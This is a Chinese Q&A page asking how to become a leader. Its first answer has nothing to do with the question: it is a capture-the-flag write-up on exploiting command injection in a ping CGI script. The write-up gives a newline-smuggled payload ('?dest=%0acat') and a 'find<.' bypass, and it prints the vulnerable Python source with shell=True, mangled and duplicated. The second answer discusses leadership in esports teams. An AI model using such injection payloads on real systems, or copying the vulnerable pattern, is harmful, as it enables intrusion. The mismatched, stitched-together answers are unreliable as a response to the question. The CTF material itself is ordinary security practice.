如何成为一名领袖?

发布网友 发布时间：2022-04-21 17:44

我来回答

共2个回答

懂视网 时间：2022-04-21 22:06

帮小伙伴解个题，想起博客很久没更新了，顺便写上来。

给了个网址，提示说按照正常思维去拿flag.......（瞬间吐槽2333333玩这个谁会自己按照正常思维啊...）

给出网页可以允许ping其他主机并显示结果。

这个阶段的话就相当于随便猜了，八九不离十是远程代码执行。然后开始常见注入测试，但是发现大部分都被过滤了。

还好换行符没被ban，unix中还能用作分隔符。

果然可以列出当前目录....然后就开始吐槽制作方的无脑.....（等下你就知道了）

然后发现这个页面同时支持GET/POST请求，写了个注入语句读取一下这个cgi的内容：

?dest=%0acat

Python

#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """  
 Smart Cat debugging interface
""" blacklist = " $;&|({`	"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badchar in blacklist:if badchar in dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """ Ping results:
%s
  """ % cgi.escape(results)

#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """  
 Smart Cat debugging interface
""" blacklist = " $;&|({`	"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badcharin blacklist:if badcharin dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """ Ping results:
%s
  """ % cgi.escape(results)

好吧原来是个python脚本....

然后发现了不能ls -R的原因，因为TAB和空格被过滤了....

不过又没人说不能用别的办法啊，于是想到某个forum里的大神提到的新方法： find<.

制作商你满满的心机啊.......诅咒你....

然后复制粘贴，拿到flag文件，尼玛为毛是个猫.......233333333333还有这个flag是什么鬼啊

热心网友 时间：2022-04-21 19:14

领袖的类型 一支队伍的经理承担很多工作，他们一般都不会参与到比赛当中。现在一般意义上的经理主要是负责战队的对外事务，以使队员们全身心投入到比赛当中而不必为其他的事分心。正常情况下，只有那些参加比赛较多并有大量赞助业务的战队需要设置经理一职。记者就此采访了Rival的经理insomn1a： Rival|insomn1a: 每天最基本的工作就是保证战队正常运行。这包括赛程的安排、会议、解答fans们的问题以及和赞助商讨论战队发展进程及远景目标等。 队长对于任何一支成功的战队来说都不可缺少，缺少了经理的队伍往往也能在比赛中能获取成功。队长的职责包括指挥比赛、保持团队的组织性以及平息队内的争论等，这需要本人有冷静的头脑而且必须有能力使同伴全力合作。 现实中和虚拟世界中的领袖有何不同呢？最大的不同在于现实中的领袖必须具有极强的表达能力和超凡的魅力；而虚拟世界中的领袖在领袖气质上基本相同，但对这两点的要求显得不那么苛刻；另一个区别在于大多数战队成员都是自愿参与的战队当中，他们没有合同*、没有财政上的顾虑等等，但战队若想真正融合为一个整体，队长就必须考虑到这些，他必须使队员们感到战队很欣赏也很担心会失去他们，要让每个队员都感到自己是战队必不可少的成员。 Rival|insomn1a: 而做为一个经理必须有好的组织能力并且能和队员们有效的进行交流，同时你必须有友善的个性以便处理好和队员及支持者们的关系，而在我眼中最重要的应该是信任，你的行为应该能够被队员们所信任。 决策的制定 每个好的领导者都有相似的决策要做。第一步是计划好，每个好的领导者都会花大量的时间做好准备工作并确保没有遗忘什么。 我就此问了U5的队长Hare——他在准备每场比赛时要花多长时间？ u5|cs-Hare: 我会花大量的时间看demo并制定战术，然后将战术传授给我的队友们以确保他们能顺畅的执行。我尽可能的看所有北美及欧洲战队的比赛demo，也常常需要在其他队员们都睡觉了还要熬夜制定战术。我会进入空无一人的服务器实地考虑特定且有效的进攻配合方式并把它们都记下来。我甚至经常制定出具体的闪光弹的战术配合，并用电子邮件发给队员们。然后我们集体进入服务器练习这些战术并和他们交流感受。 在制定完计划后第二步是向全队宣布你的计划，就像Hare给队友们发电子邮件或者进入无人的服务器那样。第三步是检验你的计划并记录下结果，最后看看队友们的表现并做出适当的调整然后重复全过程。不论他们知不知道这些计划，但都能在练习的过程中按部就班的执行，在经过足量的训练、犯足够多的错误后，他们解决所有的问题并磨合成为一个正常运转的战斗“机器”。